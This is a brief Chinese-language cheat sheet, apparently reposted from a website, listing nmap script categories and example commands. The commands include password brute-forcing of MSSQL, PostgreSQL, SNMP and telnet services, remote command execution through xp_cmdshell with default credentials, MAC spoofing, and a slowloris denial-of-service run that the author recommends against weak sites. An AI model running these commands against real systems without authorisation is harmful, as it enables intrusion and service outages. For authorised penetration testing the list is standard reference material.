nmap script 总结
? 一些常用脚本用法 ? nmap 脚本一些支持笼统扫描 usag. nmap -F --script auth 10.0.0.1 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如 dhcp/dns/sqlserver 等服务 brute: 提供暴力破解方式,针对常见的应用如 http/snmp 等 default: 提供基本脚本扫描能力 discovery: 对网络进行更多的信息,如 SMB 枚举、SNMP 查询等 dos: 用于进行拒绝服务攻击 exploit: 利用已知的漏洞入侵系统 external: 利用第三方的数据库或资源,例如进行 whois 解析 fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞? intrusive: 入侵性的脚本,此类脚本可能引发对方的 IDS/IPS 的记录或屏蔽 malware: 探测目标机是否感染了病毒、开启了后门等信息 safe: 此类与 intrusive 相反,属于安全性脚本 version: 负责增强服务与版本扫描(Version Detection)功能的脚本 vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有 MS08_067 nmap -p1433 --script=ms-sql-brute?--script-args=userdb=/var/passwd,passdb=/var/passwd 10.0.0.1 xp_cmdshell 执行命令 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args?mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user"?10.0.0.1 发现网关
nmap -p 5432 --script pgsql-brute 10.0.0.1 pgsql 破解 nmap -sU --script snmp-brute 10.0.0.1 snmp 破解 nmap -sV --script=telnet-brute 10.0.0.1 telnet 破解 nmap --script=http-methods.nse 10.0.0.1 检查 http 方法 nmap --script http-slowloris --max-parallelism 400 10.0.0.1 dos 攻击,对于处理能力较小的站点还挺好用的? nmap --spoof-mac 01:02:AE:0F,APPLE -F 10.0.01 伪造 mac mac 地址,mac 首字母,mac 所属公司 ? (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |